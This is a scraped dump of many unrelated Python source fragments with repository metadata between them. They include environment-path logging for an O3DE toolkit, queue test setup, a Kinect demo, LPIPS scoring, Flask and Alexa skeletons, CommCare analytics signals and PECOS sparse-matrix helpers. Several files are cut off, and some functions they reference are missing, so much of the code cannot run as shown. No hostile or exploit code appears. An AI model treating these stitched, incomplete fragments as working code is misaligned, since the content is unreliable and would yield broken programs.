_DCCSI_DEV_MODE = env_bool(ENVAR_DCCSI_DEV_MODE, True)
_DCCSI_LOGLEVEL = int(env_bool(ENVAR_DCCSI_LOGLEVEL, _logging.INFO))
if _DCCSI_GDEBUG:
# override loglevel if runnign debug
_DCCSI_LOGLEVEL = _logging.DEBUG
# configure basic logger
# note: not using a common logger to reduce cyclical imports
_logging.basicConfig(level=_DCCSI_LOGLEVEL,
format=FRMT_LOG_LONG,
datefmt='%m-%d %H:%M')
# re-configure basic logger for debug
_LOGGER = _logging.getLogger(_MODULENAME)
# this is just a debug developer convenience print (for testing acess)
import pkgutil
_LOGGER.info('Current working dir: {0}'.format(os.getcwd()))
search_path = ['.'] # set to None to see all modules importable from sys.path
all_modules = [x[1] for x in pkgutil.iter_modules(path=search_path)]
_LOGGER.info('All Available Modules in working dir: {0}'.format(all_modules))
# override based on current executable
PATH_DCCSI_PYTHON_LIB = STR_PATH_DCCSI_PYTHON_LIB.format(_PATH_DCCSIG,
sys.version_info.major,
sys.version_info.minor)
PATH_DCCSI_PYTHON_LIB = Path(PATH_DCCSI_PYTHON_LIB).as_posix()
# test anything procedurally generated
_LOGGER.info('Testing procedural env paths ...')
from pathlib import Path
_stash_dict = {}
_stash_dict['O3DE_DEV'] = Path(PATH_O3DE_DEV)
_stash_dict['PATH_DCCSIG'] = Path(PATH_DCCSIG)
_stash_dict['DCCSI_AZPY_PATH'] = Path(PATH_DCCSI_AZPY_PATH)
_stash_dict['PATH_DCCSI_TOOLS'] = Path(PATH_DCCSI_TOOLS)
_stash_dict['PATH_DCCSI_PYTHON_LIB'] = Path(PATH_DCCSI_PYTHON_LIB)
_stash_dict['PATH_DCCSI_TOOLS_MAYA'] = Path(PATH_DCCSI_TOOLS_MAYA)
_stash_dict['MAYA_LOCATION'] = Path(MAYA_LOCATION)
_stash_dict['DCCSI_MAYA_EXE'] = Path(DCCSI_MAYA_EXE)
_stash_dict['DCCSI_PY_MAYA'] = Path(DCCSI_PY_MAYA)
_stash_dict['MAYA_SCRIPT_PATH'] = Path(MAYA_SCRIPT_PATH)
# ---------------------------------------------------------------------
# py 2 and 3 compatible iter
for key, value in get_items(_stash_dict):
# check if path exists
try:
value.exists()
_LOGGER.info('{0}: {1}'.format(key, value))
except Exception as e:
_LOGGER.warning('FAILED PATH: {}'.format(e))
# custom prompt
sys.ps1 = "[{}]>>".format(_MODULENAME)
_LOGGER.debug('{0} took: {1} sec'.format(_MODULENAME, timeit.default_timer() - _START))
# --- END -----------------------------------------------------------------
| 41.144543 | 99 | 0.674649 |
c03733662ac655fa4e1af62db62b069a9399ac49 | 1,958 | py | Python | lib/data/finetune_imagenet.py | liqi17thu/Stand-Alone-Self-Attention | 43c016ca14a9f5ce7ab59eefe2c41d96df04d151 | [
"MIT"
] | 1 | 2020-11-29T15:59:07.000Z | 2020-11-29T15:59:07.000Z | lib/data/finetune_imagenet.py | liqi17thu/Stand-Alone-Self-Attention | 43c016ca14a9f5ce7ab59eefe2c41d96df04d151 | [
"MIT"
] | null | null | null | lib/data/finetune_imagenet.py | liqi17thu/Stand-Alone-Self-Attention | 43c016ca14a9f5ce7ab59eefe2c41d96df04d151 | [
"MIT"
] | null | null | null | import torch
import torchvision.datasets as datasets
import torchvision.transforms as transforms
from lib.data.data_util import ImageNetPolicy, ToBGRTensor
from lib.config import cfg
from lib.data.transformer_v2 import get_transforms
| 35.6 | 110 | 0.689479 |
c03974668d2a1ee4545cf6fd342d588c2d650bb4 | 6,519 | py | Python | test/acceptance/test_kamma.py | marceljanerfont/kamma | a1dfaf06475ebb2feb50ac1e6fd8eb79b2beda68 | [
"MIT"
] | 1 | 2017-06-05T04:40:01.000Z | 2017-06-05T04:40:01.000Z | test/acceptance/test_kamma.py | marceljanerfont/kamma | a1dfaf06475ebb2feb50ac1e6fd8eb79b2beda68 | [
"MIT"
] | 2 | 2017-06-29T14:23:59.000Z | 2017-06-29T14:24:58.000Z | test/acceptance/test_kamma.py | marceljanerfont/kamma | a1dfaf06475ebb2feb50ac1e6fd8eb79b2beda68 | [
"MIT"
] | null | null | null | # -*- encoding: utf-8 -*-
try:
import unittest2 as unittest
except ImportError:
import unittest
from multiprocessing import Manager
from random import randint
import logging
import sys
import os
import copy
import shutil
# add kamma path
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..')))
import kamma
TEST_PATH = "test_queue"
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)-8s] [%(name)-10s] [%(lineno)-4d] %(message)s'))
logger_kamma = logging.getLogger('kamma.app')
logger_kamma.handlers = [handler]
# logger_kamma.setLevel(logging.DEBUG)
logger_fqueue = logging.getLogger('kamma.queue')
logger_fqueue.handlers = [handler]
# logger_fqueue.setLevel(logging.DEBUG)
logger_task = logging.getLogger('kamma.task')
logger_task.handlers = [handler]
# logger_task.setLevel(logging.DEBUG)
logger = logging.getLogger('test')
logger.handlers = [handler]
logger.setLevel(logging.DEBUG)
# it should be out of the class scope, otherwise
# python tries to pickle all class and its manager and then
# the serialization will fail
the_manager = None
if __name__ == '__main__':
unittest.main()
| 33.953125 | 144 | 0.666973 |
c03a48434d8a8fb57465d077a992cea579fd3c43 | 855 | py | Python | wrappers/python/demo_mp_sync.py | Qworg/libfreenect | 4cca607b37debdd006c3e693954292da11402a7e | [
"Apache-2.0"
] | 10 | 2020-03-09T02:31:01.000Z | 2021-12-14T18:29:27.000Z | wrappers/python/demo_mp_sync.py | Qworg/libfreenect | 4cca607b37debdd006c3e693954292da11402a7e | [
"Apache-2.0"
] | null | null | null | wrappers/python/demo_mp_sync.py | Qworg/libfreenect | 4cca607b37debdd006c3e693954292da11402a7e | [
"Apache-2.0"
] | 1 | 2018-06-23T04:58:30.000Z | 2018-06-23T04:58:30.000Z | #!/usr/bin/env python
import freenect
import matplotlib.pyplot as mp
import frame_convert
import signal
keep_running = True
def handler(signum, frame):
"""Sets up the kill handler, catches SIGINT"""
global keep_running
keep_running = False
mp.ion()
mp.gray()
mp.figure(1)
image_depth = mp.imshow(get_depth(), interpolation='nearest', animated=True)
mp.figure(2)
image_rgb = mp.imshow(get_video(), interpolation='nearest', animated=True)
print('Press Ctrl-C in terminal to stop')
signal.signal(signal.SIGINT, handler)
while keep_running:
mp.figure(1)
image_depth.set_data(get_depth())
mp.figure(2)
image_rgb.set_data(get_video())
mp.draw()
mp.waitforbuttonpress(0.01)
| 21.375 | 76 | 0.730994 |
c03ae4d1c246454dbef54627c8b2804bc08c11f8 | 1,189 | py | Python | codes/models/modules/LPIPS/compute_dists.py | DinJerr/BasicSR | b992a386e63daed5193b775080b9066ff2421d85 | [
"Apache-2.0"
] | 5 | 2020-06-07T18:07:45.000Z | 2020-09-06T02:13:52.000Z | codes/models/modules/LPIPS/compute_dists.py | DinJerr/BasicSR | b992a386e63daed5193b775080b9066ff2421d85 | [
"Apache-2.0"
] | null | null | null | codes/models/modules/LPIPS/compute_dists.py | DinJerr/BasicSR | b992a386e63daed5193b775080b9066ff2421d85 | [
"Apache-2.0"
] | 1 | 2020-06-28T05:55:41.000Z | 2020-06-28T05:55:41.000Z | #import models
from models.modules.LPIPS import perceptual_loss as models
####################
# metric
####################
model = None
def calculate_lpips(img1_im, img2_im, use_gpu=False, net='squeeze', spatial=False):
'''calculate Perceptual Metric using LPIPS
img1_im, img2_im: BGR image from [0,255]
img1, img2: BGR image from [-1,1]
'''
global model
## Initializing the model
# squeeze is much smaller, needs less RAM to load and execute in CPU during training
if model is None:
model = models.PerceptualLoss(model='net-lin',net=net,use_gpu=use_gpu,spatial=spatial)
# Load images to tensors
img1 = models.im2tensor(img1_im[:,:,::-1]) # RGB image from [-1,1]
img2 = models.im2tensor(img2_im[:,:,::-1]) # RGB image from [-1,1]
if(use_gpu):
img1 = img1.cuda()
img2 = img2.cuda()
# Compute distance
if spatial==False:
dist01 = model.forward(img2,img1)
else:
dist01 = model.forward(img2,img1).mean() # Add .mean, if using add spatial=True
#print('Distance: %.3f'%dist01) #%.8f
return dist01
| 27.651163 | 94 | 0.612279 |
c03b78905f8ecc14f0212e38dfa62f635acd9408 | 59,338 | py | Python | msgraph-cli-extensions/v1_0/sites_v1_0/azext_sites_v1_0/vendored_sdks/sites/models/_sites_enums.py | thewahome/msgraph-cli | 33127d9efa23a0e5f5303c93242fbdbb73348671 | [
"MIT"
] | null | null | null | msgraph-cli-extensions/v1_0/sites_v1_0/azext_sites_v1_0/vendored_sdks/sites/models/_sites_enums.py | thewahome/msgraph-cli | 33127d9efa23a0e5f5303c93242fbdbb73348671 | [
"MIT"
] | null | null | null | msgraph-cli-extensions/v1_0/sites_v1_0/azext_sites_v1_0/vendored_sdks/sites/models/_sites_enums.py | thewahome/msgraph-cli | 33127d9efa23a0e5f5303c93242fbdbb73348671 | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum, EnumMeta
from six import with_metaclass
| 30.259052 | 119 | 0.701945 |
c03be9166bd151ec0d6a3cb24a69aeb0b4160c8e | 456 | py | Python | evntbus/decorators.py | jmwri/eventbus | fe91ab2486b99bffb0232c23d45d0c5dedce1b42 | [
"MIT"
] | null | null | null | evntbus/decorators.py | jmwri/eventbus | fe91ab2486b99bffb0232c23d45d0c5dedce1b42 | [
"MIT"
] | null | null | null | evntbus/decorators.py | jmwri/eventbus | fe91ab2486b99bffb0232c23d45d0c5dedce1b42 | [
"MIT"
] | null | null | null | import typing
if typing.TYPE_CHECKING:
from evntbus.bus import Bus
| 25.333333 | 66 | 0.644737 |
c03c898e35d62712b812e780c7c19ccba395542b | 1,481 | py | Python | src/shortcircuit/model/crestprocessor.py | farshield/shortcircu | 87d45ea85b78e3e7da72b7b44755dc429b4fdf5a | [
"MIT"
] | 35 | 2016-06-22T20:07:31.000Z | 2021-04-07T11:02:08.000Z | src/shortcircuit/model/crestprocessor.py | farshield/shortcircu | 87d45ea85b78e3e7da72b7b44755dc429b4fdf5a | [
"MIT"
] | 15 | 2016-06-17T09:36:02.000Z | 2020-10-30T11:39:07.000Z | src/shortcircuit/model/crestprocessor.py | farshield/shortcircu | 87d45ea85b78e3e7da72b7b44755dc429b4fdf5a | [
"MIT"
] | 16 | 2016-10-02T16:09:18.000Z | 2021-05-29T02:51:14.000Z | # crestprocessor.py
import threading
from PySide import QtCore
from crest.crest import Crest
| 29.62 | 107 | 0.704929 |
c03d2bdffd5f75d12bc1d6868d5c20f3a01b1c33 | 4,496 | py | Python | src/commands/pipelines.py | vicobits/sawi-cli | 0e3717e0e3d853599b87f8ea147a3f1e9566344b | [
"MIT"
] | 1 | 2019-05-02T05:16:07.000Z | 2019-05-02T05:16:07.000Z | src/commands/pipelines.py | vicobits/wise-cli | 0e3717e0e3d853599b87f8ea147a3f1e9566344b | [
"MIT"
] | null | null | null | src/commands/pipelines.py | vicobits/wise-cli | 0e3717e0e3d853599b87f8ea147a3f1e9566344b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import click
from src.commands.project import Project
from src.commands.server import Server
from src.commands.config import WebServer
from src.common.context import CommandContext
from src.common.decorators import settings, update_config_file
| 28.636943 | 99 | 0.635899 |
c03e4bfd7eee3d8023944a7e3e5535ae1233ba11 | 1,341 | py | Python | build.py | jmetzz/coffee-chatbot | da7e76d9532c8e5e38a47a19ffed1f1e27601766 | [
"MIT"
] | null | null | null | build.py | jmetzz/coffee-chatbot | da7e76d9532c8e5e38a47a19ffed1f1e27601766 | [
"MIT"
] | null | null | null | build.py | jmetzz/coffee-chatbot | da7e76d9532c8e5e38a47a19ffed1f1e27601766 | [
"MIT"
] | null | null | null | from pybuilder.core import use_plugin, init
use_plugin("python.core")
use_plugin("python.unittest")
use_plugin("python.install_dependencies")
use_plugin("python.flake8")
use_plugin("python.coverage")
name = "ActionServerPybuilder"
default_task = ['install_dependencies', 'analyze', 'publish']
| 35.289474 | 78 | 0.774049 |
c03eda4a030a4816bf3db4784bc7ac9588f4b176 | 4,278 | py | Python | electrumsv/devices/hw_wallet/plugin.py | tuoshao/electrumsv | 5f0132cafa2c90bb36c8a574874e027e44a637e6 | [
"MIT"
] | 1 | 2021-12-28T10:52:11.000Z | 2021-12-28T10:52:11.000Z | electrumsv/devices/hw_wallet/plugin.py | SomberNight/electrumsv | 28262e3cab7b73e4960466f8aee252975953acf8 | [
"MIT"
] | null | null | null | electrumsv/devices/hw_wallet/plugin.py | SomberNight/electrumsv | 28262e3cab7b73e4960466f8aee252975953acf8 | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# -*- mode: python -*-
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2016 The Electrum developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import threading
from electrumsv.i18n import _
from electrumsv.logs import logs
from electrumsv.util import versiontuple
from .cmdline import CmdLineHandler
| 39.611111 | 97 | 0.679056 |
c0418cbebf8e032e1171fe327cac277a1bbb13e1 | 631 | py | Python | api_service/tests/test_model_ids.py | seattleflu/Seattle-Flu-Incidence-Mapper | 2b72e53da974874b98e1811cdb77e170c33999f1 | [
"MIT"
] | 6 | 2019-03-22T18:28:04.000Z | 2021-02-23T03:53:19.000Z | api_service/tests/test_model_ids.py | seattleflu/Seattle-Flu-Incidence-Mapper | 2b72e53da974874b98e1811cdb77e170c33999f1 | [
"MIT"
] | 103 | 2019-04-03T15:30:06.000Z | 2021-11-15T17:48:22.000Z | api_service/tests/test_model_ids.py | seattleflu/incidence-mapper | 2b72e53da974874b98e1811cdb77e170c33999f1 | [
"MIT"
] | 6 | 2019-07-01T04:43:44.000Z | 2021-02-13T21:46:18.000Z | import unittest
from seattle_flu_incidence_mapper.utils import get_model_id
| 39.4375 | 163 | 0.681458 |
c04331c5a5c72cc4fd22977bf1a531a2facdca4e | 445 | py | Python | Cleaning.py | TharindraParanagama/MovieClassification | 2cdee9a2aaf1f55d0a59b20181e69c524c4d5895 | [
"MIT"
] | null | null | null | Cleaning.py | TharindraParanagama/MovieClassification | 2cdee9a2aaf1f55d0a59b20181e69c524c4d5895 | [
"MIT"
] | null | null | null | Cleaning.py | TharindraParanagama/MovieClassification | 2cdee9a2aaf1f55d0a59b20181e69c524c4d5895 | [
"MIT"
] | null | null | null | import csv
input = open('MovieI.csv', 'rb')
output = open('MovieO.csv', 'wb')
writer = csv.writer(output)
for row in csv.reader(input):
for i in range(len(row)):
if(row[0]==''):
break
elif(row[1]==''):
break
elif(row[2]==''):
break
elif(row[3]==''):
break
elif(row[4]==''):
break
else :writer.writerow(row)
input.close()
output.close() | 21.190476 | 33 | 0.483146 |
c0451d8d32195eb2257b24e61657609915f300f2 | 87 | py | Python | venues/apps.py | danroberts728/hsvdotbeer | 5b977bf4a7aab149ad56564b3adbb09424500308 | [
"Apache-2.0"
] | 18 | 2018-12-06T01:46:37.000Z | 2021-10-17T10:37:17.000Z | venues/apps.py | danroberts728/hsvdotbeer | 5b977bf4a7aab149ad56564b3adbb09424500308 | [
"Apache-2.0"
] | 194 | 2018-11-04T12:50:49.000Z | 2022-01-06T22:43:43.000Z | venues/apps.py | danroberts728/hsvdotbeer | 5b977bf4a7aab149ad56564b3adbb09424500308 | [
"Apache-2.0"
] | 7 | 2019-03-18T05:36:06.000Z | 2020-12-25T03:27:29.000Z | from django.apps import AppConfig
| 14.5 | 33 | 0.747126 |
c045d1511440dddecfef10dbcd54c672252a332e | 1,137 | py | Python | problems/remove-duplicates-from-sorted-list.py | sailikhithk/tech-interview-prep | e833764cf98915d56118bddfa0e01871c58de75e | [
"Apache-2.0"
] | null | null | null | problems/remove-duplicates-from-sorted-list.py | sailikhithk/tech-interview-prep | e833764cf98915d56118bddfa0e01871c58de75e | [
"Apache-2.0"
] | null | null | null | problems/remove-duplicates-from-sorted-list.py | sailikhithk/tech-interview-prep | e833764cf98915d56118bddfa0e01871c58de75e | [
"Apache-2.0"
] | null | null | null | """
The key is to use a set to remember if we seen the node or not.
Next, think about how we are going to *remove* the duplicate node?
The answer is to simply link the previous node to the next node.
So we need to keep a pointer `prev` on the previous node as we iterate the linked list.
So, the solution.
Create a set `seen`. #[1]
Point pointer `prev` on the first node. `cuur` on the second.
Now we iterate trough the linked list.
* For every node, we add its value to `seen`. Move `prev` and `curr` forward. #[2]
* If we seen the node, we *remove* the `curr` node. Then move the curr forward. #[3]
Return the `head`
"""
| 34.454545 | 88 | 0.602463 |
c046ab37f041136a24de450d5779fbb10cbaed54 | 3,344 | py | Python | corehq/apps/analytics/signals.py | kkrampa/commcare-hq | d64d7cad98b240325ad669ccc7effb07721b4d44 | [
"BSD-3-Clause"
] | 1 | 2020-05-05T13:10:01.000Z | 2020-05-05T13:10:01.000Z | corehq/apps/analytics/signals.py | kkrampa/commcare-hq | d64d7cad98b240325ad669ccc7effb07721b4d44 | [
"BSD-3-Clause"
] | 1 | 2019-12-09T14:00:14.000Z | 2019-12-09T14:00:14.000Z | corehq/apps/analytics/signals.py | MaciejChoromanski/commcare-hq | fd7f65362d56d73b75a2c20d2afeabbc70876867 | [
"BSD-3-Clause"
] | 5 | 2015-11-30T13:12:45.000Z | 2019-07-01T19:27:07.000Z | from __future__ import absolute_import
from __future__ import unicode_literals
import six
from django.conf import settings
from django.contrib.auth.signals import user_logged_in
from corehq.apps.analytics.tasks import (
track_user_sign_in_on_hubspot,
HUBSPOT_COOKIE,
update_hubspot_properties,
identify,
update_subscription_properties_by_domain, get_subscription_properties_by_user)
from corehq.apps.analytics.utils import get_meta
from corehq.apps.registration.views import ProcessRegistrationView
from corehq.util.decorators import handle_uncaught_exceptions
from corehq.util.python_compatibility import soft_assert_type_text
from corehq.util.soft_assert import soft_assert
from django.dispatch import receiver
from django.urls import reverse
from corehq.apps.users.models import CouchUser
from corehq.apps.accounting.signals import subscription_upgrade_or_downgrade
from corehq.apps.domain.signals import commcare_domain_post_save
from corehq.apps.users.signals import couch_user_post_save
from corehq.apps.analytics.utils import get_instance_string
_no_cookie_soft_assert = soft_assert(to=['{}@{}'.format('cellowitz', 'dimagi.com'),
'{}@{}'.format('biyeun', 'dimagi.com'),
'{}@{}'.format('jschweers', 'dimagi.com')],
send_to_ops=False)
def get_domain_membership_properties(couch_user):
env = get_instance_string()
return {
"{}number_of_project_spaces".format(env): len(couch_user.domains),
"{}project_spaces_list".format(env): '\n'.join(couch_user.domains),
}
| 39.341176 | 99 | 0.720993 |
c046c72c4e753549e8ec891d9f48179094bc06ed | 775 | py | Python | manage.py | BeyondLam/Flask_Blog_Python3 | 274c932e9ea28bb6c83335e408a2cd9f1cf4fcb6 | [
"Apache-2.0"
] | 2 | 2019-10-25T16:35:41.000Z | 2019-10-26T10:54:00.000Z | manage.py | BeyondLam/Flask_Blog_Python3 | 274c932e9ea28bb6c83335e408a2cd9f1cf4fcb6 | [
"Apache-2.0"
] | null | null | null | manage.py | BeyondLam/Flask_Blog_Python3 | 274c932e9ea28bb6c83335e408a2cd9f1cf4fcb6 | [
"Apache-2.0"
] | null | null | null | from app import create_app, db
from flask_script import Manager
from flask_migrate import Migrate, MigrateCommand
app = create_app("develop")
manager = Manager(app)
Migrate(app, db)
manager.add_command("db", MigrateCommand)
# ,manager
if __name__ == '__main__':
manager.run() | 27.678571 | 101 | 0.707097 |
c047ab7812a83340a4a3ccb035cf5db37d2b6b67 | 2,954 | py | Python | qiling/qiling/cc/intel.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | 2 | 2021-05-05T12:03:01.000Z | 2021-06-04T14:27:15.000Z | qiling/qiling/cc/intel.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | null | null | null | qiling/qiling/cc/intel.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | 2 | 2021-05-05T12:03:09.000Z | 2021-06-04T14:27:21.000Z | #!/usr/bin/env python3
#
# Cross Platform and Multi Architecture Advanced Binary Emulation Framework
from unicorn.x86_const import (
UC_X86_REG_AX, UC_X86_REG_EAX, UC_X86_REG_RAX, UC_X86_REG_RCX,
UC_X86_REG_RDI, UC_X86_REG_RDX, UC_X86_REG_RSI, UC_X86_REG_R8,
UC_X86_REG_R9, UC_X86_REG_R10
)
from qiling import Qiling
from . import QlCommonBaseCC
| 26.854545 | 122 | 0.728842 |
c048a21dfcef4ce86fe3963107c1c071b1d5b9b1 | 2,639 | py | Python | Alexa_Dynamo.py | gnomesoup/pyDynamo | dea046e96f7973fcb6c28a274a3092b246457551 | [
"Unlicense",
"MIT"
] | null | null | null | Alexa_Dynamo.py | gnomesoup/pyDynamo | dea046e96f7973fcb6c28a274a3092b246457551 | [
"Unlicense",
"MIT"
] | null | null | null | Alexa_Dynamo.py | gnomesoup/pyDynamo | dea046e96f7973fcb6c28a274a3092b246457551 | [
"Unlicense",
"MIT"
] | null | null | null | ### ----------- Python Code ------------###
import csv
from flask import Flask, render_template
from flask_ask import Ask, statement, question, session
import pandas as pd
### ------------- Start Alexa Stuff ---------###
app = Flask(__name__)
ask = Ask(app, "/")
#logging.getLogger("flask_ask").setLevel(logging.DEBUG)
### ----------- Switch Function --------------###
### ----------- Switch Function --------------###
### ----------- Launch Skill --------------###
### -------------- Say Hello --------------- ####
### -------------- Create Points --------------- ####
### -------------- Create Connection --------------- ####
### -------------- Create Framing --------------- ####
### -------------- Reset --------------- ####
### -------------- Count Framing --------------- ####
### --------------- Port for Ngrok -------------##
if __name__ == '__main__':
port = 9000 #the custom port you want
app.run(host='0.0.0.0', port=port)
app.run(debug=True) | 30.333333 | 71 | 0.575597 |
c04935b8a935560d2540de8efce949baca20ee57 | 846 | py | Python | HW/hklearn/model.py | leguiart/Machine-Learning | 2fd3c583fbfd8fc3ee12c9106db7b4dfa29bc253 | [
"MIT"
] | null | null | null | HW/hklearn/model.py | leguiart/Machine-Learning | 2fd3c583fbfd8fc3ee12c9106db7b4dfa29bc253 | [
"MIT"
] | null | null | null | HW/hklearn/model.py | leguiart/Machine-Learning | 2fd3c583fbfd8fc3ee12c9106db7b4dfa29bc253 | [
"MIT"
] | null | null | null | import abc
'''
Interfaz sobre la cual todo modelo implementa.
Todo modelo dentro de la biblioteca hklearn implementa
los siguientes comportamientos:
-fit : Entrena el modelo con un a matriz de ejemplos X y sus respectivas etiquetas y
-predict : El modelo entrenado, predice con base en una entrada X
de ejemplos
'''
| 31.333333 | 89 | 0.640662 |
c0499e4593031598062f2a6d6d126c43c5ef1d2d | 35,951 | py | Python | pecos/utils/smat_util.py | UniqueUpToPermutation/pecos | 52dba0b6a1d5d0809838ac9ddb6c02a93da2624e | [
"Apache-2.0",
"BSD-3-Clause"
] | 2 | 2021-07-28T21:09:58.000Z | 2021-09-24T03:37:45.000Z | pecos/utils/smat_util.py | UniqueUpToPermutation/pecos | 52dba0b6a1d5d0809838ac9ddb6c02a93da2624e | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | pecos/utils/smat_util.py | UniqueUpToPermutation/pecos | 52dba0b6a1d5d0809838ac9ddb6c02a93da2624e | [
"Apache-2.0",
"BSD-3-Clause"
] | 1 | 2021-09-24T04:00:47.000Z | 2021-09-24T04:00:47.000Z | # Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance
# with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
import collections
import numpy as np
import scipy.sparse as smat
def cs_matrix(arg1, mat_type, shape=None, dtype=None, copy=False, check_contents=False):
"""Custom compressed sparse matrix constructor that allows indices and indptr to be stored in different types.
Args:
arg1 (tuple): (data, indices, indptr) to construct compressed sparse matrix
mat_type (type): the matrix type to construct, one of [scipy.sparse.csr_matrix | scipy.sparse.csc_matrix]
shape (tuple, optional): shape of the matrix, default None to infer from arg1
dtype (type, optional): type of values in the matrix, default None to infer from data
copy (bool, optional): whether to copy the input arrays, defaults to False
check_contents (bool, optional): whether to check array contents to determine dtype, defaults to False
Returns:
compressed sparse matrix in mat_type
"""
(data, indices, indptr) = arg1
indices_dtype = smat.sputils.get_index_dtype(indices, check_contents=check_contents)
indptr_dtype = smat.sputils.get_index_dtype(indptr, check_contents=check_contents)
ret = mat_type(shape, dtype=dtype)
# Read matrix dimensions given, if any
if shape is None:
# shape not already set, try to infer dimensions
try:
major_dim = len(ret.indptr) - 1
minor_dim = ret.indices.max() + 1
except Exception:
raise ValueError("unable to infer matrix dimensions")
else:
shape = ret._swap((major_dim, minor_dim))
ret.indices = np.array(indices, copy=copy, dtype=indices_dtype)
ret.indptr = np.array(indptr, copy=copy, dtype=indptr_dtype)
ret.data = np.array(data, copy=copy, dtype=dtype)
return ret
def csr_matrix(arg1, shape=None, dtype=None, copy=False):
"""Custom csr_matrix constructor that allows indices and indptr to be stored in different types.
Args:
arg1 (tuple): (data, indices, indptr) to construct csr_matrix
shape (tuple, optional): shape of the matrix, default None to infer from arg1
dtype (type, optional): type of values in the matrix, default None to infer from data
copy (bool, optional): whether to copy the input arrays, defaults to False
Returns:
csr_matrix
"""
return cs_matrix(arg1, smat.csr_matrix, shape=shape, dtype=dtype, copy=copy)
def csc_matrix(arg1, shape=None, dtype=None, copy=False):
"""Custom csc_matrix constructor that allows indices and indptr to be stored in different types.
Args:
arg1 (tuple): (data, indices, indptr) to construct csc_matrix
shape (tuple, optional): shape of the matrix, default None to infer from arg1
dtype (type, optional): type of values in the matrix, default None to infer from data
copy (bool, optional): whether to copy the input arrays, defaults to False
Returns:
csc_matrix
"""
return cs_matrix(arg1, smat.csc_matrix, shape=shape, dtype=dtype, copy=copy)
def save_matrix(tgt, mat):
"""Save dense or sparse matrix to file.
Args:
tgt (str): path to save the matrix
mat (numpy.ndarray or scipy.sparse.spmatrix): target matrix to save
"""
assert isinstance(tgt, str), "tgt for save_matrix must be a str, but got {}".format(type(tgt))
with open(tgt, "wb") as tgt_file:
if isinstance(mat, np.ndarray):
np.save(tgt_file, mat, allow_pickle=False)
elif isinstance(mat, smat.spmatrix):
smat.save_npz(tgt_file, mat, compressed=False)
else:
raise NotImplementedError("Save not implemented for matrix type {}".format(type(mat)))
def load_matrix(src, dtype=None):
"""Load dense or sparse matrix from file.
Args:
src (str): path to load the matrix.
dtype (numpy.dtype, optional): if given, convert matrix dtype. otherwise use default type.
Returns:
mat (numpy.ndarray or scipy.sparse.spmatrix): loaded matrix
Notes:
If underlying matrix is {"csc", "csr", "bsr"}, indices will be sorted.
"""
if not isinstance(src, str):
raise ValueError("src for load_matrix must be a str")
mat = np.load(src)
# decide whether it's dense or sparse
if isinstance(mat, np.ndarray):
pass
elif isinstance(mat, np.lib.npyio.NpzFile):
# Ref code: https://github.com/scipy/scipy/blob/v1.4.1/scipy/sparse/_matrix_io.py#L19-L80
matrix_format = mat["format"].item()
if not isinstance(matrix_format, str):
# files saved with SciPy < 1.0.0 may contain unicode or bytes.
matrix_format = matrix_format.decode("ascii")
try:
cls = getattr(smat, "{}_matrix".format(matrix_format))
except AttributeError:
raise ValueError("Unknown matrix format {}".format(matrix_format))
if matrix_format in ("csc", "csr", "bsr"):
mat = cls((mat["data"], mat["indices"], mat["indptr"]), shape=mat["shape"])
# This is in-place operation
mat.sort_indices()
elif matrix_format == "dia":
mat = cls((mat["data"], mat["offsets"]), shape=mat["shape"])
elif matrix_format == "coo":
mat = cls((mat["data"], (mat["row"], mat["col"])), shape=mat["shape"])
else:
raise NotImplementedError(
"Load is not implemented for sparse matrix of format {}.".format(matrix_format)
)
else:
raise TypeError("load_feature_matrix encountered unknown input format {}".format(type(mat)))
if dtype is None:
return mat
else:
return mat.astype(dtype)
def transpose(mat):
"""Transpose a dense/sparse matrix.
Args:
X (np.ndarray, spmatrix): input matrix to be transposed.
Returns:
transposed X
"""
if not isinstance(mat, smat.spmatrix):
raise ValueError("mat must be a smat.spmatrix type")
if isinstance(mat, smat.csr_matrix):
return csc_matrix((mat.data, mat.indices, mat.indptr), shape=(mat.shape[1], mat.shape[0]))
elif isinstance(mat, smat.csc_matrix):
return csr_matrix((mat.data, mat.indices, mat.indptr), shape=(mat.shape[1], mat.shape[0]))
else:
return mat.T
def sorted_csr_from_coo(shape, row_idx, col_idx, val, only_topk=None):
"""Return a row-sorted CSR matrix from a COO sparse matrix.
